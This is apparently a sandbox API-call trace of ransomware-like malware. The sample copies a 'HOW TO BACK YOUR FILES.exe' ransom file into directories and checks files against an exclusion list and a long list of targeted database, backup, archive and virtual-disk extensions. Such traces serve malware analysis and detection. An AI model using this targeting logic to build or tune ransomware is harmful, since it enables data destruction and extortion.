1 [0082.375] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c28 | out: hHeap=0x2b0000) returned 1 [0082.375] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages") returned 91 [0082.375] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages" | out: lpString1="C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages") returned="C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages" [0082.375] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0082.375] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\how to back your files.exe"), bFailIfExists=1) returned 0 [0082.376] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0082.376] GetLastError () returned 0x0 [0082.376] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0082.376] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0082.376] CloseHandle (hObject=0x120) returned 1 [0082.376] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0082.376] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0082.376] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabe4080, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x4c2576a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c2576a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0082.376] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0082.376] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0082.376] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0082.376] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabe4080, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x4c2576a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c2576a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0082.376] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0082.376] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0082.376] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0082.376] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0082.376] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c2576a0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c2576a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0082.377] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0082.377] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabe4080, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x4c27d800, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c27d800, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vcRuntimeAdditional_amd64", cAlternateFileName="VCRUNT~1")) returned 1 [0082.377] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0082.377] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2="aoldtz.exe") returned 1 [0082.377] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2=".") returned 1 [0082.377] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2="..") returned 1 [0082.377] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2="windows") returned -1 [0082.377] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2="bootmgr") returned 1 [0082.377] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2="temp") returned 1 [0082.377] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2="pagefile.sys") returned 1 [0082.377] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2="boot") returned 1 [0082.377] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2="ids.txt") returned 1 [0082.377] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2="ntuser.dat") returned 1 [0082.377] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2="perflogs") returned 1 [0082.377] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2="MSBuild") returned 1 [0082.377] lstrlenW (lpString="vcRuntimeAdditional_amd64") returned 25 [0082.377] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\*") returned 93 [0082.377] lstrcpyW (in: lpString1=0x2cce4b8, lpString2="vcRuntimeAdditional_amd64" | out: lpString1="vcRuntimeAdditional_amd64") returned="vcRuntimeAdditional_amd64" [0082.377] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7c28 [0082.377] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xec) returned 0x2c8eb8 [0082.377] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7c30 | out: ListHead=0x2e7710, ListEntry=0x2e7c30) returned 0x2e7b90 [0082.377] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabe4080, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x4c27d800, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c27d800, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vcRuntimeAdditional_amd64", cAlternateFileName="VCRUNT~1")) returned 0 [0082.377] FindClose (in: hFindFile=0x2cd0e8 | out: hFindFile=0x2cd0e8) returned 1 [0082.377] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7c30 [0082.377] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64") returned="C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64" [0082.377] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8eb8 | out: hHeap=0x2b0000) returned 1 [0082.377] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c28 | out: hHeap=0x2b0000) returned 1 [0082.377] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64") returned 117 [0082.377] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64" | out: lpString1="C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64") returned="C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64" [0082.377] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0082.377] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\how to back your files.exe"), bFailIfExists=1) returned 0 [0082.380] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0082.381] GetLastError () returned 0x0 [0082.381] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0082.381] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0082.381] CloseHandle (hObject=0x120) returned 1 [0082.381] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0082.381] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0082.381] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabe4080, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x4c27d800, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c27d800, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0082.381] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0082.381] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0082.381] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0082.381] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabe4080, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x4c27d800, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c27d800, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0082.381] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0082.381] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0082.381] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0082.381] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0082.381] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa87bcb00, ftCreationTime.dwHighDateTime=0x1ced4d9, ftLastAccessTime.dwLowDateTime=0xa87bcb00, ftLastAccessTime.dwHighDateTime=0x1ced4d9, ftLastWriteTime.dwLowDateTime=0xa87bcb00, ftLastWriteTime.dwHighDateTime=0x1ced4d9, nFileSizeHigh=0x0, nFileSizeLow=0x588124, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cab1.cab", cAlternateFileName="")) returned 1 [0082.381] lstrcmpiW (lpString1="cab1.cab", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0082.381] lstrcmpiW (lpString1="cab1.cab", lpString2="aoldtz.exe") returned 1 [0082.381] lstrcmpiW (lpString1="cab1.cab", lpString2=".") returned 1 [0082.381] lstrcmpiW (lpString1="cab1.cab", lpString2="..") returned 1 [0082.381] lstrcmpiW (lpString1="cab1.cab", lpString2="windows") returned -1 [0082.381] lstrcmpiW (lpString1="cab1.cab", lpString2="bootmgr") returned 1 [0082.381] lstrcmpiW (lpString1="cab1.cab", lpString2="temp") returned -1 [0082.381] lstrcmpiW (lpString1="cab1.cab", lpString2="pagefile.sys") returned -1 [0082.381] lstrcmpiW (lpString1="cab1.cab", lpString2="boot") returned 1 [0082.381] lstrcmpiW (lpString1="cab1.cab", lpString2="ids.txt") returned -1 [0082.381] lstrcmpiW (lpString1="cab1.cab", lpString2="ntuser.dat") returned -1 [0082.381] lstrcmpiW (lpString1="cab1.cab", lpString2="perflogs") returned -1 [0082.382] lstrcmpiW (lpString1="cab1.cab", lpString2="MSBuild") returned -1 [0082.382] lstrlenW (lpString="cab1.cab") returned 8 [0082.382] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\*") returned 119 [0082.382] lstrcpyW (in: lpString1=0x2cce4ec, lpString2="cab1.cab" | out: lpString1="cab1.cab") returned="cab1.cab" [0082.382] lstrlenW (lpString="cab1.cab") returned 8 [0082.382] lstrlenW (lpString="Ares865") returned 7 [0082.382] lstrcmpiW (lpString1="ab1.cab", lpString2="Ares865") returned -1 [0082.382] lstrlenW (lpString=".dll") returned 4 [0082.382] lstrcmpiW (lpString1="cab1.cab", lpString2=".dll") returned 1 [0082.382] lstrlenW (lpString=".lnk") returned 4 [0082.382] lstrcmpiW (lpString1="cab1.cab", lpString2=".lnk") returned 1 [0082.382] lstrlenW (lpString=".ini") returned 4 [0082.382] lstrcmpiW (lpString1="cab1.cab", lpString2=".ini") returned 1 [0082.382] lstrlenW (lpString=".sys") returned 4 [0082.382] lstrcmpiW (lpString1="cab1.cab", lpString2=".sys") returned 1 [0082.382] lstrlenW (lpString="cab1.cab") returned 8 [0082.382] lstrlenW (lpString="bak") returned 3 [0082.382] lstrcmpiW (lpString1="cab", lpString2="bak") returned 1 [0082.382] lstrlenW (lpString="ba_") returned 3 [0082.382] lstrcmpiW (lpString1="cab", lpString2="ba_") returned 1 [0082.382] lstrlenW (lpString="dbb") returned 3 [0082.382] lstrcmpiW (lpString1="cab", lpString2="dbb") returned -1 [0082.382] lstrlenW (lpString="vmdk") returned 4 [0082.382] lstrcmpiW (lpString1=".cab", lpString2="vmdk") returned -1 [0082.382] lstrlenW (lpString="rar") returned 3 [0082.382] lstrcmpiW (lpString1="cab", lpString2="rar") returned -1 [0082.382] lstrlenW (lpString="zip") returned 3 [0082.382] lstrcmpiW (lpString1="cab", lpString2="zip") returned -1 [0082.382] lstrlenW (lpString="tgz") returned 3 [0082.382] lstrcmpiW (lpString1="cab", lpString2="tgz") returned -1 [0082.382] lstrlenW (lpString="vbox") returned 4 [0082.382] lstrcmpiW (lpString1=".cab", lpString2="vbox") returned -1 [0082.382] lstrlenW (lpString="vdi") returned 3 [0082.382] lstrcmpiW (lpString1="cab", lpString2="vdi") returned -1 [0082.382] lstrlenW (lpString="vhd") returned 3 [0082.382] lstrcmpiW (lpString1="cab", lpString2="vhd") returned -1 [0082.382] lstrlenW (lpString="vhdx") returned 4 [0082.382] lstrcmpiW (lpString1=".cab", lpString2="vhdx") returned -1 [0082.383] lstrlenW (lpString="avhd") returned 4 [0082.383] lstrcmpiW (lpString1=".cab", lpString2="avhd") returned -1 [0082.383] lstrlenW (lpString="db") returned 2 [0082.383] lstrcmpiW (lpString1="ab", lpString2="db") returned -1 [0082.383] lstrlenW (lpString="db2") returned 3 [0082.383] lstrcmpiW (lpString1="cab", lpString2="db2") returned -1 [0082.383] lstrlenW (lpString="db3") returned 3 [0082.383] lstrcmpiW (lpString1="cab", lpString2="db3") returned -1 [0082.383] lstrlenW (lpString="dbf") returned 3 [0082.383] lstrcmpiW (lpString1="cab", lpString2="dbf") returned -1 [0082.383] lstrlenW (lpString="mdf") returned 3 [0082.383] lstrcmpiW (lpString1="cab", lpString2="mdf") returned -1 [0082.383] lstrlenW (lpString="mdb") returned 3 [0082.383] lstrcmpiW (lpString1="cab", lpString2="mdb") returned -1 [0082.383] lstrlenW (lpString="sql") returned 3 [0082.383] lstrcmpiW (lpString1="cab", lpString2="sql") returned -1 [0082.383] lstrlenW (lpString="sqlite") returned 6 [0082.383] lstrcmpiW (lpString1="b1.cab", lpString2="sqlite") returned -1 [0082.383] lstrlenW (lpString="sqlite3") returned 7 [0082.383] lstrcmpiW (lpString1="ab1.cab", lpString2="sqlite3") returned -1 [0082.383] lstrlenW (lpString="sqlitedb") returned 8 [0082.383] lstrlenW (lpString="xml") returned 3 [0082.383] lstrcmpiW (lpString1="cab", lpString2="xml") returned -1 [0082.383] lstrlenW (lpString="$er") returned 3 [0082.383] lstrcmpiW (lpString1="cab", lpString2="$er") returned 1 [0082.383] lstrlenW (lpString="4dd") returned 3 [0082.383] lstrcmpiW (lpString1="cab", lpString2="4dd") returned 1 [0082.383] lstrlenW (lpString="4dl") returned 3 [0082.383] lstrcmpiW (lpString1="cab", lpString2="4dl") returned 1 [0082.383] lstrlenW (lpString="^^^") returned 3 [0082.383] lstrcmpiW (lpString1="cab", lpString2="^^^") returned 1 [0082.383] lstrlenW (lpString="abs") returned 3 [0082.383] lstrcmpiW (lpString1="cab", lpString2="abs") returned 1 [0082.383] lstrlenW (lpString="abx") returned 3 [0082.383] lstrcmpiW (lpString1="cab", lpString2="abx") returned 1 [0082.383] lstrlenW (lpString="accdb") returned 5 [0082.383] lstrcmpiW (lpString1="1.cab", lpString2="accdb") returned -1 [0082.383] lstrlenW (lpString="accdc") returned 5 [0082.383] lstrcmpiW (lpString1="1.cab", lpString2="accdc") returned -1 [0082.384] lstrlenW (lpString="accde") returned 5 [0082.384] lstrcmpiW (lpString1="1.cab", lpString2="accde") returned -1 [0082.384] lstrlenW (lpString="accdr") returned 5 [0082.384] lstrcmpiW (lpString1="1.cab", lpString2="accdr") returned -1 [0082.384] lstrlenW (lpString="accdt") returned 5 [0082.384] lstrcmpiW (lpString1="1.cab", lpString2="accdt") returned -1 [0082.384] lstrlenW (lpString="accdw") returned 5 [0082.384] lstrcmpiW (lpString1="1.cab", lpString2="accdw") returned -1 [0082.384] lstrlenW (lpString="accft") returned 5 [0082.384] lstrcmpiW (lpString1="1.cab", lpString2="accft") returned -1 [0082.384] lstrlenW (lpString="adb") returned 3 [0082.384] lstrcmpiW (lpString1="cab", lpString2="adb") returned 1 [0082.384] lstrlenW (lpString="adb") returned 3 [0082.384] lstrcmpiW (lpString1="cab", lpString2="adb") returned 1 [0082.384] lstrlenW (lpString="ade") returned 3 [0082.384] lstrcmpiW (lpString1="cab", lpString2="ade") returned 1 [0082.384] lstrlenW (lpString="adf") returned 3 [0082.384] lstrcmpiW (lpString1="cab", lpString2="adf") returned 1 [0082.384] lstrlenW (lpString="adn") returned 3 [0082.384] lstrcmpiW (lpString1="cab", lpString2="adn") returned 1 [0082.384] lstrlenW (lpString="adp") returned 3 [0082.384] lstrcmpiW (lpString1="cab", lpString2="adp") returned 1 [0082.384] lstrlenW (lpString="alf") returned 3 [0082.384] lstrcmpiW (lpString1="cab", lpString2="alf") returned 1 [0082.384] lstrlenW (lpString="ask") returned 3 [0082.384] lstrcmpiW (lpString1="cab", lpString2="ask") returned 1 [0082.384] lstrlenW (lpString="btr") returned 3 [0082.384] lstrcmpiW (lpString1="cab", lpString2="btr") returned 1 [0082.384] lstrlenW (lpString="cat") returned 3 [0082.384] lstrcmpiW (lpString1="cab", lpString2="cat") returned -1 [0082.384] lstrlenW (lpString="cdb") returned 3 [0082.384] lstrcmpiW (lpString1="cab", lpString2="cdb") returned -1 [0082.384] lstrlenW (lpString="ckp") returned 3 [0082.384] lstrcmpiW (lpString1="cab", lpString2="ckp") returned -1 [0082.384] lstrlenW (lpString="cma") returned 3 [0082.384] lstrcmpiW (lpString1="cab", lpString2="cma") returned -1 [0082.384] lstrlenW (lpString="cpd") returned 3 [0082.384] lstrcmpiW (lpString1="cab", lpString2="cpd") returned -1 [0082.384] lstrlenW (lpString="dacpac") returned 6 [0082.385] lstrcmpiW (lpString1="b1.cab", lpString2="dacpac") returned -1 [0082.385] lstrlenW (lpString="dad") returned 3 [0082.385] lstrcmpiW (lpString1="cab", lpString2="dad") returned -1 [0082.385] lstrlenW (lpString="dadiagrams") returned 10 [0082.385] lstrlenW (lpString="daschema") returned 8 [0082.385] lstrlenW (lpString="db-journal") returned 10 [0082.385] lstrlenW (lpString="db-shm") returned 6 [0082.385] lstrcmpiW (lpString1="b1.cab", lpString2="db-shm") returned -1 [0082.385] lstrlenW (lpString="db-wal") returned 6 [0082.385] lstrcmpiW (lpString1="b1.cab", lpString2="db-wal") returned -1 [0082.385] lstrlenW (lpString="dbc") returned 3 [0082.385] lstrcmpiW (lpString1="cab", lpString2="dbc") returned -1 [0082.385] lstrlenW (lpString="dbs") returned 3 [0082.385] lstrcmpiW (lpString1="cab", lpString2="dbs") returned -1 [0082.385] lstrlenW (lpString="dbt") returned 3 [0082.385] lstrcmpiW (lpString1="cab", lpString2="dbt") returned -1 [0082.385] lstrlenW (lpString="dbv") returned 3 [0082.385] lstrcmpiW (lpString1="cab", lpString2="dbv") returned -1 [0082.385] lstrlenW (lpString="dbx") returned 3 [0082.385] lstrcmpiW (lpString1="cab", lpString2="dbx") returned -1 [0082.385] lstrlenW (lpString="dcb") returned 3 [0082.385] lstrcmpiW (lpString1="cab", lpString2="dcb") returned -1 [0082.385] lstrlenW (lpString="dct") returned 3 [0082.385] lstrcmpiW (lpString1="cab", lpString2="dct") returned -1 [0082.385] lstrlenW (lpString="dcx") returned 3 [0082.385] lstrcmpiW (lpString1="cab", lpString2="dcx") returned -1 [0082.385] lstrlenW (lpString="ddl") returned 3 [0082.385] lstrcmpiW (lpString1="cab", lpString2="ddl") returned -1 [0082.385] lstrlenW (lpString="dlis") returned 4 [0082.385] lstrcmpiW (lpString1=".cab", lpString2="dlis") returned -1 [0082.385] lstrlenW (lpString="dp1") returned 3 [0082.385] lstrcmpiW (lpString1="cab", lpString2="dp1") returned -1 [0082.385] lstrlenW (lpString="dqy") returned 3 [0082.385] lstrcmpiW (lpString1="cab", lpString2="dqy") returned -1 [0082.385] lstrlenW (lpString="dsk") returned 3 [0082.385] lstrcmpiW (lpString1="cab", lpString2="dsk") returned -1 [0082.385] lstrlenW (lpString="dsn") returned 3 [0082.385] lstrcmpiW (lpString1="cab", lpString2="dsn") returned -1 [0082.385] lstrlenW (lpString="dtsx") returned 4 [0082.386] lstrcmpiW (lpString1=".cab", lpString2="dtsx") returned -1 [0082.386] lstrlenW (lpString="dxl") returned 3 [0082.386] lstrcmpiW (lpString1="cab", lpString2="dxl") returned -1 [0082.386] lstrlenW (lpString="eco") returned 3 [0082.386] lstrcmpiW (lpString1="cab", lpString2="eco") returned -1 [0082.386] lstrlenW (lpString="ecx") returned 3 [0082.386] lstrcmpiW (lpString1="cab", lpString2="ecx") returned -1 [0082.386] lstrlenW (lpString="edb") returned 3 [0082.386] lstrcmpiW (lpString1="cab", lpString2="edb") returned -1 [0082.386] lstrlenW (lpString="epim") returned 4 [0082.386] lstrcmpiW (lpString1=".cab", lpString2="epim") returned -1 [0082.386] lstrlenW (lpString="fcd") returned 3 [0082.386] lstrcmpiW (lpString1="cab", lpString2="fcd") returned -1 [0082.386] lstrlenW (lpString="fdb") returned 3 [0082.386] lstrcmpiW (lpString1="cab", lpString2="fdb") returned -1 [0082.386] lstrlenW (lpString="fic") returned 3 [0082.386] lstrcmpiW (lpString1="cab", lpString2="fic") returned -1 [0082.386] lstrlenW (lpString="flexolibrary") returned 12 [0082.386] lstrlenW (lpString="fm5") returned 3 [0082.386] lstrcmpiW (lpString1="cab", lpString2="fm5") returned -1 [0082.386] lstrlenW (lpString="fmp") returned 3 [0082.386] lstrcmpiW (lpString1="cab", lpString2="fmp") returned -1 [0082.386] lstrlenW (lpString="fmp12") returned 5 [0082.386] lstrcmpiW (lpString1="1.cab", lpString2="fmp12") returned -1 [0082.386] lstrlenW (lpString="fmpsl") returned 5 [0082.386] lstrcmpiW (lpString1="1.cab", lpString2="fmpsl") returned -1 [0082.386] lstrlenW (lpString="fol") returned 3 [0082.386] lstrcmpiW (lpString1="cab", lpString2="fol") returned -1 [0082.386] lstrlenW (lpString="fp3") returned 3 [0082.386] lstrcmpiW (lpString1="cab", lpString2="fp3") returned -1 [0082.386] lstrlenW (lpString="fp4") returned 3 [0082.386] lstrcmpiW (lpString1="cab", lpString2="fp4") returned -1 [0082.386] lstrlenW (lpString="fp5") returned 3 [0082.386] lstrcmpiW (lpString1="cab", lpString2="fp5") returned -1 [0082.386] lstrlenW (lpString="fp7") returned 3 [0082.386] lstrcmpiW (lpString1="cab", lpString2="fp7") returned -1 [0082.386] lstrlenW (lpString="fpt") returned 3 [0082.386] lstrcmpiW (lpString1="cab", lpString2="fpt") returned -1 [0082.386] lstrlenW (lpString="frm") returned 3 [0082.387] lstrcmpiW (lpString1="cab", lpString2="frm") returned -1 [0082.387] lstrlenW (lpString="gdb") returned 3 [0082.387] lstrcmpiW (lpString1="cab", lpString2="gdb") returned -1 [0082.387] lstrlenW (lpString="gdb") returned 3 [0082.387] lstrcmpiW (lpString1="cab", lpString2="gdb") returned -1 [0082.387] lstrlenW (lpString="grdb") returned 4 [0082.387] lstrcmpiW (lpString1=".cab", lpString2="grdb") returned -1 [0082.387] lstrlenW (lpString="gwi") returned 3 [0082.387] lstrcmpiW (lpString1="cab", lpString2="gwi") returned -1 [0082.387] lstrlenW (lpString="hdb") returned 3 [0082.387] lstrcmpiW (lpString1="cab", lpString2="hdb") returned -1 [0082.387] lstrlenW (lpString="his") returned 3 [0082.387] lstrcmpiW (lpString1="cab", lpString2="his") returned -1 [0082.387] lstrlenW (lpString="ib") returned 2 [0082.387] lstrcmpiW (lpString1="ab", lpString2="ib") returned -1 [0082.387] lstrlenW (lpString="idb") returned 3 [0082.387] lstrcmpiW (lpString1="cab", lpString2="idb") returned -1 [0082.387] lstrlenW (lpString="ihx") returned 3 [0082.387] lstrcmpiW (lpString1="cab", lpString2="ihx") returned -1 [0082.387] lstrlenW (lpString="itdb") returned 4 [0082.387] lstrcmpiW (lpString1=".cab", lpString2="itdb") returned -1 